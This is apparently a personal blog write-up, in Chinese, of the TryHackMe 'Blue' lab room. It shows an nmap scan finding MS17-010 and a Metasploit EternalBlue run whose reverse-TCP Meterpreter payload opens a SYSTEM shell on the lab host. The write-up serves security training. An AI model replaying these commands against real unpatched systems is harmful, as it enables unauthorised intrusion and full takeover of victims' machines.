Lluna's Pure land.

What is life like when singing to wine?

0%

tryhackme-[blue]

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 6.4k 阅读时长 ≈ 6 分钟

0x01.Demo

0x02.信息收集

看到了ms17-010(永恒之蓝)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
root@JIYE:~/tryhackme/blue# nmap -sC -vv --script=vuln 10.10.246.255 -oN nmap.demo
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 05:38 EST
NSE: Loaded 105 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 05:38
Completed NSE at 05:38, 10.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 05:38
Completed NSE at 05:38, 0.00s elapsed
Initiating Ping Scan at 05:38
Scanning 10.10.246.255 [4 ports]
Completed Ping Scan at 05:38, 0.30s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:38
Completed Parallel DNS resolution of 1 host. at 05:38, 0.02s elapsed
Initiating SYN Stealth Scan at 05:38
Scanning 10.10.246.255 [1000 ports]
Discovered open port 445/tcp on 10.10.246.255
Discovered open port 3389/tcp on 10.10.246.255
Discovered open port 139/tcp on 10.10.246.255
Discovered open port 135/tcp on 10.10.246.255
Discovered open port 49154/tcp on 10.10.246.255
Discovered open port 49159/tcp on 10.10.246.255
Discovered open port 49153/tcp on 10.10.246.255
Discovered open port 49158/tcp on 10.10.246.255
Discovered open port 49152/tcp on 10.10.246.255
Completed SYN Stealth Scan at 05:39, 46.22s elapsed (1000 total ports)
NSE: Script scanning 10.10.246.255.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 05:39
NSE: [ssl-ccs-injection 10.10.246.255:3389] No response from server: ERROR
NSE Timing: About 88.47% done; ETC: 05:39 (0:00:04 remaining)
NSE Timing: About 89.08% done; ETC: 05:40 (0:00:07 remaining)
Completed NSE at 05:40, 90.23s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 05:40
Completed NSE at 05:40, 0.00s elapsed
Nmap scan report for 10.10.246.255
Host is up, received echo-reply ttl 127 (0.25s latency).
Scanned at 2021-01-15 05:38:32 EST for 136s
Not shown: 991 closed ports
Reason: 991 resets
PORT      STATE SERVICE       REASON
135/tcp   open  msrpc         syn-ack ttl 127
139/tcp   open  netbios-ssn   syn-ack ttl 127
445/tcp   open  microsoft-ds  syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
49152/tcp open  unknown       syn-ack ttl 127
49153/tcp open  unknown       syn-ack ttl 127
49154/tcp open  unknown       syn-ack ttl 127
49158/tcp open  unknown       syn-ack ttl 127
49159/tcp open  unknown       syn-ack ttl 127

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 05:40
Completed NSE at 05:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 05:40
Completed NSE at 05:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 147.23 seconds
           Raw packets sent: 1189 (52.292KB) | Rcvd: 1066 (42.672KB)
root@JIYE:~/tryhackme/blue#

0x03.MSF直接利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.246.255
rhosts => 10.10.246.255
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.9.248.83
lhost => 10.9.248.83
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.10.246.255    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.9.248.83      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.9.248.83:4444 
[*] 10.10.246.255:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.246.255:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.246.255:445     - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.246.255:445 - Connecting to target for exploitation.
[+] 10.10.246.255:445 - Connection established for exploitation.
[+] 10.10.246.255:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.246.255:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.246.255:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.246.255:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.246.255:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.246.255:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.246.255:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.246.255:445 - Sending all but last fragment of exploit packet
[*] 10.10.246.255:445 - Starting non-paged pool grooming
[+] 10.10.246.255:445 - Sending SMBv2 buffers
[+] 10.10.246.255:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.246.255:445 - Sending final SMBv2 buffers.
[*] 10.10.246.255:445 - Sending last fragment of exploit packet!
[*] 10.10.246.255:445 - Receiving response from exploit packet
[+] 10.10.246.255:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.246.255:445 - Sending egg to corrupted connection.
[*] 10.10.246.255:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.246.255
[*] Meterpreter session 1 opened (10.9.248.83:4444 -> 10.10.246.255:49201) at 2021-01-15 05:54:08 -0500
[+] 10.10.246.255:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.246.255:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.246.255:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
-------------纸短情长下次再见-------------